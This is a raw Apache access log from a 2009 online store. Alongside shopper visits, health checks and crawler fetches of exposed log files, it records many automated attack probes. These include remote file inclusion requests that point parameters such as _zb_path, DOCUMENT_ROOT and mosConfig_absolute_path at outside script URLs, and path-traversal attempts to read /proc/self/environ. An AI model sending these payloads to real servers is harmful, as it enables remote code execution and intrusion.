121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:10 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:11 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5785E1E0008CFC08D+M37+ENG HTTP/1.1" 200 77353 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:13 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5785E1E0008CFC08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:13 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5785E1E0008CFC08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:13 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5785E1E0008CFC08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:13 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:17 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5C8EA140008A7C08D+M37+ENG HTTP/1.1" 200 57446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:18 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:26 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5C8EA140008A7C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
209.216.203.109 - - [26/Nov/2009:03:37:57 -0500] "GET /index.php?redir=http://crit.fileave.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.216.203.109 - - [26/Nov/2009:03:37:57 -0500] "GET /logs/index.php?redir=http://crit.fileave.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:11 -0500] "GET //?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:11 -0500] "GET /logs//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 27553 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:15 -0500] "GET //?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:15 -0500] "GET /logs//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 27553 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:47 -0500] "GET //?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:40:47 -0500] "GET /logs//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 27553 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:41:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:34 -0500] "GET /?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:34 -0500] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:03:41:34 -0500] "GET /logs/?DOCUMENT_ROOT=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:41:55 -0500] "GET /logs/access_log.Q109081500//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:41:58 -0500] "GET /logs//themes/default/index.php?main=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:41:58 -0500] "GET //themes/default/index.php?main=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:03:41:58 -0500] "GET /logs/access_log.Q109052300//themes/default/index.php?main=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:42:01 -0500] "GET /logs/access_log.Q109062800%20%20//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:42:22 -0500] "GET //?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:42:22 -0500] "GET /logs//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 27553 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:43:03 -0500] "GET /logs/access_log.Q109062800//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.236.46.4 - - [26/Nov/2009:03:44:05 -0500] "GET /logs/error_log.Q109070600/?sourcedir=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:03:44:05 -0500] "GET /?sourcedir=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:03:44:06 -0500] "GET /logs/?sourcedir=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 200 27548 "-" "libwww-perl/5.805"
72.232.176.226 - - [26/Nov/2009:03:46:08 -0500] "GET //?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.232.176.226 - - [26/Nov/2009:03:46:08 -0500] "GET /logs//?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 27553 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:46:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.111.169 - - [26/Nov/2009:03:46:42 -0500] "GET /logs/access_log.Q109091200 HTTP/1.0" 200 2862401 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.139.67.116 - - [26/Nov/2009:03:48:31 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:31 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:31 -0500] "GET /logs/access_log.Q109091100%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:31 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:33 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:33 -0500] "GET /logs/access_log.Q109091100%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:55 -0500] "GET /logs/access_log.Q109091100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:55 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:55 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:56 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:56 -0500] "GET /logs/access_log.Q109091100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:48:56 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.236.46.4 - - [26/Nov/2009:03:48:59 -0500] "GET /?sourcedir=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:03:48:59 -0500] "GET /logs/?sourcedir=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 200 27548 "-" "libwww-perl/5.805"
67.195.111.169 - - [26/Nov/2009:03:48:42 -0500] "GET /logs/error_log.Q109080200 HTTP/1.0" 200 2484946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.111.169 - - [26/Nov/2009:03:49:05 -0500] "GET /logs/error_log.Q109080200 HTTP/1.0" 200 2484946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [26/Nov/2009:03:50:11 -0500] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:11 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:13 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:18 -0500] "GET /logs/access_log.Q109092500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:21 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:21 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:21 -0500] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:50:28 -0500] "GET /logs/access_log.Q109092500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:51:25 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.234.200.177 - - [26/Nov/2009:03:51:27 -0500] "GET /lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.177 - - [26/Nov/2009:03:51:27 -0500] "GET /logs/error_log.Q109101800/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.177 - - [26/Nov/2009:03:51:28 -0500] "GET /lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.177 - - [26/Nov/2009:03:51:28 -0500] "GET /logs/error_log.Q109101800/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
67.195.114.54 - - [26/Nov/2009:03:51:14 -0500] "GET /logs/access_log.Q109092400 HTTP/1.0" 200 7812198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [26/Nov/2009:03:51:31 -0500] "GET /logs/access_log.Q109092400 HTTP/1.0" 200 7812198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [26/Nov/2009:03:51:45 -0500] "GET /logs/access_log.Q109092400 HTTP/1.0" 200 7812198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [26/Nov/2009:03:52:08 -0500] "GET /logs/access_log.Q109092400 HTTP/1.0" 200 7812198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [26/Nov/2009:03:52:32 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:52:32 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:52:32 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:03:52:44 -0500] "GET /logs/access_log.Q109091100%20%20////include/bbs.lib.inc.php?site_path=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:03:52:44 -0500] "GET ////include/bbs.lib.inc.php?site_path=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:03:52:48 -0500] "GET /logs////include/bbs.lib.inc.php?site_path=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:02 -0500] "GET /logs/error_log.Q109071700//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:02 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:02 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:27 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:27 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:27 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.169.189.169 - - [26/Nov/2009:03:53:47 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CA52886100009F5C08D+M37+ENG HTTP/1.1" 200 57482 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5C8EA140008A7C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:53:49 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
122.199.140.158 - - [26/Nov/2009:03:53:51 -0500] "GET /logs/error_log.Q109110700//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:03:53:53 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.169.189.169 - - [26/Nov/2009:03:54:01 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE5387918000474C08E+M37+ENG HTTP/1.1" 200 57397 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA52886100009F5C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:03 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
67.195.114.54 - - [26/Nov/2009:03:53:31 -0500] "GET /logs/error_log.Q109101100 HTTP/1.0" 200 3906870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [26/Nov/2009:03:53:31 -0500] "GET /logs/access_log.Q109081400 HTTP/1.0" 200 5006864 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [26/Nov/2009:03:54:34 -0500] "GET /logs/error_log.Q109110700//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.169.189.169 - - [26/Nov/2009:03:54:35 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE5F83A1B00045DC08E+M37+ENG HTTP/1.1" 200 58106 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE5387918000474C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:37 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:38 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE508BD13000786C08E+M37+ENG HTTP/1.1" 200 48042 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE5F83A1B00045DC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:40 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
200.234.200.177 - - [26/Nov/2009:03:54:40 -0500] "GET /logs/error_log.Q109110100/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
